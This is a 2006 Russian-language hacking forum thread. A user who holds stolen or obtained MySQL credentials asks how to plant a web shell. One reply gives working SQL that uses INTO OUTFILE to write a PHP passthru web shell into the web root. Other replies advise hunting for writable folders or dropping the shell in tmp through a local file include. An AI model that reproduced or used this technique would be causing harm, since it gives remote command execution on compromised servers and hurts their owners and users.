ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Shell через sql
  #1  
Старый 05.11.2006, 10:38
Аватар для Ambient_man
Ambient_man
Новичок
Регистрация: 14.10.2006
Сообщений: 11
Провел на форуме:
132925

Репутация: 1
По умолчанию Shell через sql

Знающие подскажите , реально ли это сделать.

Есть доступ к mysql , то есть логин и пасс для доступа.

Как залить шелл ? и реально ли это ?

Если можно с примерами ...
 

  #2  
Старый 05.11.2006, 10:46
Аватар для spheere
spheere
Новичок
Регистрация: 24.05.2006
Сообщений: 13
Провел на форуме:
257517

Репутация: 16
По умолчанию

CREATE TABLE `config` (`script` TEXT NOT NULL) COMMENT = 'config';
INSERT INTO `config` ( `script` ) VALUES ('<? passthru($_GET['sh']) ?>');
SELECT script FROM `config` INTO OUTFILE '/home/www/html/config.php';
DROP TABLE `config`;

Тока эта, поменяй название таблицы и имя файла...
Ато можно ненароком подменить настоящие.

Последний раз редактировалось spheere; 05.11.2006 в 10:49..
 

  #3  
Старый 05.11.2006, 11:18
Аватар для Ambient_man
Ambient_man
Новичок
Регистрация: 14.10.2006
Сообщений: 11
Провел на форуме:
132925

Репутация: 1
По умолчанию

Цитата:
Сообщение от spheere  
CREATE TABLE `config` (`script` TEXT NOT NULL) COMMENT = 'config';
INSERT INTO `config` ( `script` ) VALUES ('<? passthru($_GET['sh']) ?>');
SELECT script FROM `config` INTO OUTFILE '/home/www/html/config.php';
DROP TABLE `config`;

Тока эта, поменяй название таблицы и имя файла...
Ато можно ненароком подменить настоящие.

#1 - Can't create/write to file '..\..\..\www\co2nfig.php' (Errcode: 2)
 

  #4  
Старый 05.11.2006, 11:23
Аватар для spheere
spheere
Новичок
Регистрация: 24.05.2006
Сообщений: 13
Провел на форуме:
257517

Репутация: 16
По умолчанию

Найди папку справами на запись, например Uploads...
И путь подбери, вобщем экспериментируй.
 

  #5  
Старый 05.11.2006, 12:01
Аватар для degeneration x
degeneration x
Познающий
Регистрация: 11.10.2005
Сообщений: 97
Провел на форуме:
732018

Репутация: 117
По умолчанию

Или если есть локальный инклюд, лей шелл в tmp.
 

  #6  
Старый 06.11.2006, 15:19
Аватар для m0nzt3r
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию

эта тема не раз обсуждалась.поиск по словам "into , outfile"
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть первая k00p3r Чужие Статьи 1 12.07.2005 08:51
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ